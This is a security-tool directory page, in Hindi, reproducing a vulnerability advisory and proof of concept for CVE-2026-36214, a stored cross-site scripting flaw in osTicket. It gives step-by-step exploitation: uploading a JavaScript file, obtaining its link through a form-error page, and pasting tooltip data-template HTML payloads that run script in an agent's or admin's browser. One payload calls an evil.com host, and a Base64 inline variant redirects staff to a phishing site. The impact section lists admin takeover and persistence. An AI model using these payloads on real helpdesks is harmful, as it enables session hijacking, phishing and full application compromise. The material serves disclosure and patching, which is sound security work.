Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-36214 — osTicket में कमजोर Bootstrap टूलटिप घटक के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) | Kitploit
उपकरण/GitHubGitHub/weswrench/cve-2026-36214
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubweswrench/cve-2026-36214

CVE-2026-36214

osTicket में कमजोर Bootstrap टूलटिप घटक के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-36214 - osTicket में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोर Bootstrap Tooltip घटक के माध्यम से

विवरण

Enhancesoft osTicket के संस्करण 1.10 से 1.17.7 तक और 1.18.0 से 1.18.3 तक ज्ञात-कमजोर Bootstrap Tooltip 3.3.4 घटक (CVE-2019-8331) के साथ आते हैं, जो एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता उत्पन्न करता है। डिफ़ॉल्ट osTicket कॉन्फ़िगरेशन में, टिकट सबमिट करने वाले ("उपयोगकर्ता") पूर्व प्रमाणीकरण के बिना टिकट सबमिट कर सकते हैं, और उपयोगकर्ता स्व-पंजीकरण डिफ़ॉल्ट रूप से खुला है। एक दूरस्थ उपयोगकर्ता एक दुर्भावनापूर्ण टिकट संदेश तैयार कर सकता है, जो htmlLawed HTML-सैनिटाइज़ेशन मॉड्यूल से गुजरने के बावजूद, किसी भी देखने वाले एजेंट या व्यवस्थापक के ब्राउज़र में मनमाना JavaScript निष्पादन का परिणाम देता है। यह समस्या और भी गंभीर हो जाती है क्योंकि उपयोगकर्ता द्वारा अपलोड की गई JavaScript फ़ाइलें एक्ज़ीक्यूट JavaScript Content-Type प्रकार (text/javascript) के साथ परोसी जाती हैं, जिससे ब्राउज़रों द्वारा उन्हें सक्रिय सामग्री के रूप में व्याख्यायित किया जा सकता है। जबकि इनलाइन पेलोड उस तरीके से सीमित होते हैं जिस तरह Bootstrap Tooltip 3.3.4 data-template मान को jQuery ऑब्जेक्ट में पार्स करता है और उसे appendTo() या insertAfter() के माध्यम से DOM में सम्मिलित करता है, हमलावर-नियंत्रित कोड को बाहरी स्क्रिप्ट के रूप में निष्पादित करना इन सीमाओं से बचता है और भेद्यता का अधिक शक्तिशाली शोषण सक्षम करता है।

प्रभावित संस्करण

  • परीक्षित और पुष्टि की गई कमजोर:

    • osTicket 1.18.2
    • osTicket 1.18.3
  • प्रभावित संस्करण:

    • v1.10 - v1.17.8 (छोड़कर)
    • v1.18 - v1.18.4 (छोड़कर)

यह घटक osTicket कोडबेस में 13 मई, 2015 से मौजूद है, जैसा कि निम्न द्वारा दिखाया गया है:

  • फ़ाइल: scp/js/bootstrap-tooltip.js
  • कमिट: e5a28410ae7c238932eef07c2b3568da015a792c

यह कमिट osTicket रिलीज़ टैग से जुड़ा है जो संस्करण 1.10 से जुड़े हैं, यह दर्शाता है कि कमजोर Bootstrap Tooltip घटक कई प्रमुख संस्करणों में osTicket रिलीज़ की एक विस्तृत श्रृंखला में शामिल रहा है। यह दीर्घकालिक समावेश दृढ़ता से सुझाव देता है कि कई वर्षों में जारी किए गए कई osTicket संस्करण प्रभावित हैं।


1. अवलोकन

osTicket एक व्यापक रूप से उपयोग की जाने वाली ओपन-सोर्स टिकटिंग प्रणाली है जो अंतिम उपयोगकर्ताओं को टिकट निर्माण और उत्तरों के भाग के रूप में समृद्ध HTML सामग्री और फ़ाइल अनुलग्नक सबमिट करने की अनुमति देती है।

osTicket उपयोगकर्ताओं की तीन मुख्य श्रेणियां परिभाषित करता है:

  • Admin
    • पूर्ण प्रशासनिक पहुंच
    • वैश्विक कॉन्फ़िगरेशन, उपयोगकर्ता, भूमिकाएं, प्लगइन्स
  • Agent
    • टिकटों तक परिचालन पहुंच
    • टिकट देख सकते हैं, उत्तर दे सकते हैं, स्थानांतरित कर सकते हैं, बंद कर सकते हैं
  • User (Client / End User)
    • केवल क्लाइंट पोर्टल तक पहुंच सकता है
    • अपने स्वयं के टिकट बना और देख सकता है

किसी उपयोगकर्ता द्वारा सबमिट की गई कोई भी HTML सामग्री बाद में एजेंट या व्यवस्थापक के ब्राउज़र में प्रस्तुत की जा सकती है, जिससे क्लाइंट-साइड भेद्यताएं विशेष रूप से प्रभावशाली हो जाती हैं।


2. प्रमाण की अवधारणा

सबसे पहले, अपने अंतिम-उपयोगकर्ता खाते का उपयोग करके प्रमाणित करें और टिकट निर्माण पृष्ठ पर जाएं।
फिर एक पेलोड युक्त JavaScript फ़ाइल (जैसे: test.js) बनाएं। उदाहरण के लिए:

root@kitploit:~
alert(123);

ध्यान दें: डिफ़ॉल्ट रूप से, osTicket टिकट अनुलग्नकों को बिना किसी फ़ाइल प्रकार प्रतिबंध के अनुमति देता है।

JS फ़ाइल अपलोड करें

फिर बिना कोई “Issue Details” प्रदान किए “Create Ticket” पर क्लिक करके टिकट सबमिट करें।

एप्लिकेशन हमें त्रुटि “Issue Details is a required field” के साथ टिकट सबमिशन फ़ॉर्म पर वापस पुनर्निर्देशित करेगा।
यह पृष्ठ हमें वास्तव में टिकट सबमिट किए बिना हमारी JavaScript फ़ाइल (test.js) के लिए एक डाउनलोड लिंक प्राप्त करने की अनुमति देता है।

हमारी अपलोड की गई JS फ़ाइल का सीधा लिंक प्राप्त करें

हमारी अपलोड की गई JS फ़ाइल का Content-Type

एक बार जब आप यह लिंक प्राप्त कर लें, तो टिकट सबमिशन फ़ॉर्म पर लौटें।
HTML संपादक पर क्लिक करें और इस पेलोड को पेस्ट करें, script टैग के src विशेषता को पहले प्राप्त लिंक से बदलते हुए।

root@kitploit:~
<input>
<div style="width:100%;height:100%;pOsition:fixed;tOp:0px;lEft:0px;z-Index:9999" data-toggle="tooltip" title="t" data-template="<script src='[LINK_HERE]'>"></div>
<input>

नीचे एक पूर्ण पेलोड का उदाहरण दिया गया है, जहां [LINK_HERE] पैटर्न को पहले प्राप्त लिंक से बदल दिया गया है:

root@kitploit:~
<input>
<div style="width:100%;height:100%;pOsition:fixed;tOp:0px;lEft:0px;z-Index:9999" data-toggle="tooltip" title="t" data-template="<script src='http://localhost:8080/file.php?key=rjfge-qlcmbwgnsfl8hhwktyhctre-_e&expires=1768780800&signature=5044f8201f041228de077a2e025e6fc118b31223'>"></div>
<input>

फिर टिकट सबमिट करें।

दुर्भावनापूर्ण पेलोड सबमिट करें

जब कोई व्यवस्थापक या एजेंट हमारा दुर्भावनापूर्ण टिकट देखता है, तो पेलोड ट्रिगर हो जाता है।

पेलोड ट्रिगर हुआ

परिणाम:
जब कोई व्यवस्थापक/एजेंट दुर्भावनापूर्ण टिकट खोलता है, तो JavaScript पेलोड व्यवस्थापक/एजेंट सत्र के संदर्भ में लोड और निष्पादित होता है।

इसके परिणामस्वरूप एक संग्रहीत XSS (stored XSS) होता है, जो पूर्ण सत्र समझौता करने की अनुमति देता है (उदाहरण के लिए ezXSS, CSRF के माध्यम से व्यवस्थापक/एजेंट क्रियाएं करने के लिए)।


3. प्रभाव

एजेंट समझौता

यदि दुर्भावनापूर्ण टिकट किसी एजेंट द्वारा देखा जाता है, तो संग्रहीत XSS एजेंट के प्रमाणित सत्र के संदर्भ में निष्पादित होता है।

यह एक हमलावर को सत्र कुकी निकाले बिना एजेंट सत्र पर प्रभावी रूप से कब्जा करने में सक्षम बनाता है (उदाहरण के लिए, ऐसे परिदृश्यों में भी जहां कुकी बाहर निकालना व्यावहारिक नहीं है और ezXSS जैसे ब्लाइंड-XSS प्लेटफ़ॉर्म का उपयोग किया जाता है)। एक बार XSS चलने के बाद, हमलावर वह कोई भी क्रिया कर सकता है जो समझौता किया गया एजेंट करने के लिए अधिकृत है, उदाहरण के लिए:

  • उस एजेंट के लिए सुलभ टिकटों को देखना (अक्सर हेल्पडेस्क का एक बड़ा हिस्सा शामिल होता है)
  • टिकट अनुलग्नकों को डाउनलोड करना और समीक्षा करना
  • टिकटों का उत्तर देना और उपयोगकर्ताओं के साथ बातचीत करना
  • टिकट स्थानांतरित करना, बंद करना, या अन्यथा टिकट स्थिति अपडेट करना
  • आंतरिक नोट्स जोड़ना (यदि अनुमति हो)

इसके परिणामस्वरूप एजेंट की परिचालन क्षमताओं और टिकटिंग वर्कफ़्लो की गोपनीयता/अखंडता से पूर्ण समझौता होता है।

व्यवस्थापक समझौता

यदि दुर्भावनापूर्ण टिकट किसी व्यवस्थापक द्वारा देखा जाता है, तो प्रभाव पूर्ण अनुप्रयोग समझौते तक बढ़ जाता है। हमलावर निम्नलिखित कर सकता है:

  • व्यवस्थापक सत्र पर कब्जा करना
  • वैश्विक कॉन्फ़िगरेशन (सेटिंग्स, अनुमतियां, ...) संशोधित करना
  • महत्वपूर्ण कॉन्फ़िगरेशन मानों को बदलकर सेवा से वंचित (denial of service) करना
  • प्रशासनिक “पेजों” / टेम्पलेट्स को संशोधित करना, जिससे अनुप्रयोग UI पर वैश्विक विरूपण (defacement) और फ़िशिंग संभव हो
  • स्थिरता (persistence) स्थापित करने के लिए नए एजेंट और/या व्यवस्थापक खाते बनाना

प्रतिबंधित फ़ाइल अपलोड और सामग्री सुरक्षा नीति के बारे में नोट

यद्यपि osTicket की डिफ़ॉल्ट कॉन्फ़िगरेशन JavaScript फ़ाइल अपलोड की अनुमति देती है, osTicket को व्यवस्थापक पैनल में इस प्रकार कॉन्फ़िगर किया जा सकता है कि अंतिम उपयोगकर्ता को JavaScript फ़ाइलें अपलोड करने की अनुमति न हो।

इसके अलावा, एजेंटों और व्यवस्थापकों द्वारा उपयोग किया जाने वाला स्टाफ नियंत्रण पैनल एक सामग्री सुरक्षा नीति लागू करता है जो तीसरे पक्ष के डोमेन से उत्पन्न JavaScript के निष्पादन को रोकती है।
आइए निम्नलिखित पेलोड को एक उदाहरण के रूप में लें:

root@kitploit:~
<input>
<div style="width:100%;height:100%;pOsition:fixed;tOp:0px;lEft:0px;z-Index:9999" data-toggle="tooltip" title="t" data-template="<script src='http://evil.com'></object>"></div>
<input>

नीचे दिया गया स्क्रीनशॉट दिखाता है कि https://evil.com से स्क्रिप्ट लोड करना स्टाफ नियंत्रण पैनल पर लागू सामग्री सुरक्षा नीति द्वारा अवरुद्ध कर दिया गया था।

CSP द्वारा अवरुद्ध पेलोड

हालाँकि, अनुप्रयोग पर लागू सामग्री सुरक्षा नीति इनलाइन JavaScript की अनुमति देती है।

एजेंट/व्यवस्थापक पैनल पर CSP

ऐसे मामले में जहां JavaScript फ़ाइल अपलोड अवरुद्ध हैं, फिर भी एक हमलावर के लिए दुर्भावनापूर्ण क्रियाएं करना संभव है। आइए नीचे दिए गए पेलोड पर विचार करें:

root@kitploit:~
<input>
<div style="width:100%;height:100%;pOsition:fixed;tOp:0px;lEft:0px;z-Index:9999" data-toggle="tooltip" title="t" data-template=""></div>
<input>

Base64 पेलोड निम्नलिखित में डिकोड होता है:

root@kitploit:~
<script>top.location = "https://example.com";</script>

यह पेलोड एक हमलावर को दुर्भावनापूर्ण टिकट देखने वाले एजेंट या व्यवस्थापक को एक मनमानी वेबसाइट पर पुनर्निर्देशित करने की अनुमति देता है, उदाहरण के लिए एक फ़िशिंग साइट।

ऊपर दिए गए पेलोड वाले टिकट को देखने के बाद का परिणाम यहां दिया गया है। मनमानी वेबसाइट पर पुनर्निर्देशन

टूल डाउनलोड करें